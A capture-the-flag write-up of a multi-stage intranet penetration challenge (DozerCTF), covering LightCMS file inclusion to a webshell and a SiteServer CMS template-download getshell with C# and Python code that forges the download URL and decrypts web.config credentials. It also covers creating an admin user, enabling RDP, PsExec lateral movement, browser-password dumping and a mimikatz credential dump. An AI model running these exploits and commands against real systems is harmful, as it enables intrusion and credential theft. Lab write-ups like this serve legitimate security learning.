DozerCTF Domain Penetration

CTFWP Intranet Penetration no tag June 3, 2021

flag1

After the XCTF final I noticed Dozer was also running a competition, and one of its penetration challenges seemed worth studying in detail.

Opening it up, it is lightcms.

This recalls the Red Hat Cup (红帽杯) challenge set by 郭院士 a few days ago.

First log in to the admin backend with dozer/dozer123.

An arbitrary file read vulnerability for this CMS can be found on GitHub.

Using the arbitrary file read, read the originally vulnerable file

and find that it has gained an extra testInclude:

    public function testInclude(Request $request)
    {
        // 'file' comes straight from the request and is only prefixed with a fixed directory,
        // so any readable file under /var/www/html/public/ (or reached through ../) is included as PHP
        $file = $request->has('file') ? $request->get('file') : 'index.php';
        @include('/var/www/html/public/'.$file);
    }

Then have the server download a jpg carrying a webshell over HTTP and include it through testInclude

to get a shell.

flag1:Dozerctf{k94jf8ejdbzks2l4o40rjdnfewrkyosd}

flag2

Next, upload a Viper payload and get a Viper session. Once it is online, add a route and scan the intranet through the proxy.

Inside, there is a host at .234.

Request http://10.10.1.234/robots.txt

which returns:

User-agent: *
Disallow: /SiteServer/
Disallow: /SiteFiles/
Disallow: /home/

which indicates SiteServer CMS.

Look up SiteServer vulnerabilities:

https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell

Upload the template zip (poxteam.zip) to the jump host

and start an HTTP server there.

First encrypt the download URL with SiteServer's secret key:

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace EncryptApplication
{
    class Encrypt
    {
        static void Main(string[] args)
        {
            var _encryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
            var _decryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
            var _inputString = "http://10.10.1.47:9001/poxteam.zip";
            var _outString = "";
            var _noteMessage = "";
            byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
            try
            {
                // DES takes an 8-byte key, so only the first 8 characters of the secret key matter
                var byKey = Encoding.UTF8.GetBytes(_encryptKey.Length > 8 ? _encryptKey.Substring(0, 8) : _encryptKey);
                var des = new DESCryptoServiceProvider();   // defaults: CBC mode, PKCS7 padding
                var inputByteArray = Encoding.UTF8.GetBytes(_inputString);
                var ms = new MemoryStream();
                var cs = new CryptoStream(ms, des.CreateEncryptor(byKey, iv), CryptoStreamMode.Write);
                cs.Write(inputByteArray, 0, inputByteArray.Length);
                cs.FlushFinalBlock();
                _outString = Convert.ToBase64String(ms.ToArray());
                Console.WriteLine("DesEncrypt:");
                Console.WriteLine(_outString);
            }
            catch (Exception error)
            {
                _noteMessage = error.Message;
            }
        }
    }
}

Then replace the characters that are unsafe in a query string with a Python script:

# Base64 DES output from the C# program above; swap the characters SiteServer
# does not accept raw in the query string for its 0xxx0 tokens
str_decry = "ZjYIub/YxA05+dg8BqV7gWPgR82cOjhyE6hgZjPTM3/iCxJzxSm/yQ=="
str_decry = str_decry.replace("+", "0add0").replace("=", "0equals0").replace("&", "0and0").replace("?", "0question0").replace("/", "0slash0")

print(str_decry)

Finally request http://10.10.1.234//SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=ZjYIub0slash0YxA050add0dg8BqV7gWPgR82cOjhyE6hgZjPTM30slash0iCxJzxSm0slash0yQ0equals00equals0&directoryName=yang99

Visit the backdoor

and it comes online.

Get the second flag:

flag2:DozerCTF{b59d9f9e843dedb09e407849f3396cb1}

flag3

Check web.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <appSettings>
    <add key="IsProtectData" value="True" />
    <add key="DatabaseType" value="9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0" />
    <add key="ConnectionString" value="Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0" />
  </appSettings>
  <system.web>
    <httpRuntime requestValidationMode="2.0" requestPathInvalidCharacters="" maxRequestLength="40960" executionTimeout="2000" useFullyQualifiedRedirectUrl="false" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="100" enableVersionHeader="false" />
    <pages validateRequest="false" enableSessionState="true" enableViewState="true" enableEventValidation="false" controlRenderingCompatibilityVersion="4.0" clientIDMode="AutoID" />
    <customErrors mode="Off" />
    <sessionState mode="InProc" timeout="30" />
    <trace enabled="false" requestLimit="1000" pageOutput="true" traceMode="SortByTime" localOnly="true" />
    <globalization fileEncoding="utf-8" requestEncoding="utf-8" responseEncoding="utf-8" />
    <compilation debug="false" />
  </system.web>
  <system.webServer>
    <modules>
      <!--iisnode默认不支持PUT和DELETE的解决-->
      <remove name="WebDAVModule" />
      <!--路由模型删掉再加一次-->
      <remove name="UrlRoutingModule-4.0" />
      <add name="UrlRoutingModule-4.0" type="System.Web.Routing.UrlRoutingModule" preCondition="" />
      <add name="ErrorRedirectModule" type="SiteServer.API.ErrorRedirectModule, SiteServer.API" />
    </modules>
    <handlers>
      <remove name="ExtensionlessUrlHandler-Integrated-4.0" />
      <remove name="OPTIONSVerbHandler" />
      <remove name="TRACEVerbHandler" />
      <add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
    </handlers>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-9.0.0.0" newVersion="9.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Http" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Net.Http.Formatting" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-2.1.0.0" newVersion="2.1.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Cors" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.AspNet.SignalR.Core" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-2.2.1.0" newVersion="2.2.1.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

Decrypt the values with DES using the same key,

which yields server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site
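The encryption step under flag2 (DES, Base64, then the 0add0/0slash0 substitutions) and the decryption of web.config here are the same scheme run in opposite directions, so here is one added Python example that does both. It is not code from this writeup or from SiteServer CMS. It assumes the hard-coded default secret key and fixed IV used in the C# program above, that DES runs in CBC mode with PKCS7 padding (the .NET DESCryptoServiceProvider defaults), and that either the cryptography package or pycryptodome is installed; the web.config excerpt, hosts and URL are the values from this page.

```python
import base64
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

# Assumed: the default SecretKey hard-coded in SiteServer CMS and the fixed IV used
# by the C# encryptor above. DESCryptoServiceProvider defaults are CBC + PKCS7, and
# only the first 8 characters of the key are used.
SECRET_KEY = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5"
DES_KEY = SECRET_KEY[:8].encode()
IV = bytes([0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF])

# Substitutions SiteServer applies so the Base64 blob survives inside a query string.
URL_SUBST = [("+", "0add0"), ("=", "0equals0"), ("&", "0and0"),
             ("?", "0question0"), ("/", "0slash0")]


def encode_for_url(b64: str) -> str:
    for ch, tok in URL_SUBST:
        b64 = b64.replace(ch, tok)
    return b64


def decode_from_url(token: str) -> str:
    # Not injective: a Base64 string that legitimately contains "0add0" decodes wrongly.
    for ch, tok in URL_SUBST:
        token = token.replace(tok, ch)
    return token


def _pkcs7_pad(data: bytes) -> bytes:
    n = 8 - len(data) % 8
    return data + bytes([n]) * n


def _pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= 8 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS7 padding: wrong key or corrupted ciphertext")
    return data[:-n]


def _des_cbc(data: bytes, encrypt: bool) -> bytes:
    """Single-DES CBC over whole blocks, using whichever library is installed."""
    try:
        try:  # cryptography >= 43 moved DES into the 'decrepit' module
            from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
        except ImportError:
            from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
        from cryptography.hazmat.primitives.ciphers import Cipher, modes
    except ImportError:
        from Crypto.Cipher import DES  # pycryptodome fallback
        des = DES.new(DES_KEY, DES.MODE_CBC, iv=IV)
        return des.encrypt(data) if encrypt else des.decrypt(data)
    # An 8-byte key makes TripleDES degenerate to single DES (K1 = K2 = K3).
    cipher = Cipher(TripleDES(DES_KEY), modes.CBC(IV))
    op = cipher.encryptor() if encrypt else cipher.decryptor()
    return op.update(data) + op.finalize()


def encrypt_by_secret_key(plaintext: str) -> str:
    """DES-CBC, Base64, then the query-string substitutions (the C# + Python steps)."""
    raw = _des_cbc(_pkcs7_pad(plaintext.encode("utf-8")), encrypt=True)
    return encode_for_url(base64.b64encode(raw).decode("ascii"))


def decrypt_by_secret_key(token: str) -> str:
    """Inverse of encrypt_by_secret_key, for the protected values in web.config."""
    raw = base64.b64decode(decode_from_url(token))
    return _pkcs7_unpad(_des_cbc(raw, encrypt=False)).decode("utf-8")


def build_template_download_url(host: str, zip_url: str, directory_name: str) -> str:
    """The SiteTemplateDownload request that makes the CMS fetch and unpack zip_url."""
    qs = urlencode({"type": "SiteTemplateDownload", "userKeyPrefix": "test",
                    "downloadUrl": encrypt_by_secret_key(zip_url),
                    "directoryName": directory_name})
    return f"http://{host}/SiteServer/Ajax/ajaxOtherService.aspx?{qs}"


def decrypt_app_settings(web_config_xml: str) -> dict:
    """DatabaseType/ConnectionString from web.config, decrypted when IsProtectData is True."""
    adds = ET.fromstring(web_config_xml).iter("add")
    settings = {a.get("key"): a.get("value") for a in adds if a.get("key")}
    protect = settings.get("IsProtectData", "").lower() == "true"
    return {k: decrypt_by_secret_key(v) if protect else v
            for k, v in settings.items() if k in ("DatabaseType", "ConnectionString")}


# appSettings block copied from the web.config shown on this page.
WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="IsProtectData" value="True" />
    <add key="DatabaseType" value="9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0" />
    <add key="ConnectionString" value="Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0" />
  </appSettings>
</configuration>"""

if __name__ == "__main__":
    print(build_template_download_url("10.10.1.234", "http://10.10.1.47:9001/poxteam.zip", "yang99"))
    for key, value in decrypt_app_settings(WEB_CONFIG).items():
        print(f"{key} = {value}")
```

Because the key is a published default and the IV is fixed, anyone who can read web.config (or who can reach the ajaxOtherService endpoint) can both recover the database credentials and forge a valid downloadUrl; the only thing that stops the forgery is setting a non-default SecretKey.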

First log in to the database with msf,

then run a command.

The flag is on the Administrator's desktop.

Got the third flag.

flag4

Next, create a user:

net user yang99 test@123.com /add
net localgroup Administrators yang99 /add

Enable port 3389:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

This only clears the deny flag; if the host firewall is on, the Remote Desktop rule group also has to be allowed. If the connection is still rejected, disable Network Level Authentication on the RDP-Tcp listener as well:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Then connect over Remote Desktop

and find DozerOCS on the Administrator's desktop; analysing its memory yields the credentials Alice / FkuWvj08.

Log in to 10.10.1.121 with that account.

Since the personal PC does not have port 3389 open, use PsExec64.exe to connect to Alice's PC.

The fourth flag is on Alice's desktop.

flag5

Then upload hack-browser-data.exe and dump Alice's browser data.

It contains a saved password:

Alice Alice@Dozer@2021

Log in to the backend with it.

Write a shell and read the flag.

Add a user, connect, and upload mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt

which gives the hashes.


© 2023 Yang_99的小窝. Using Typecho & Moricolor.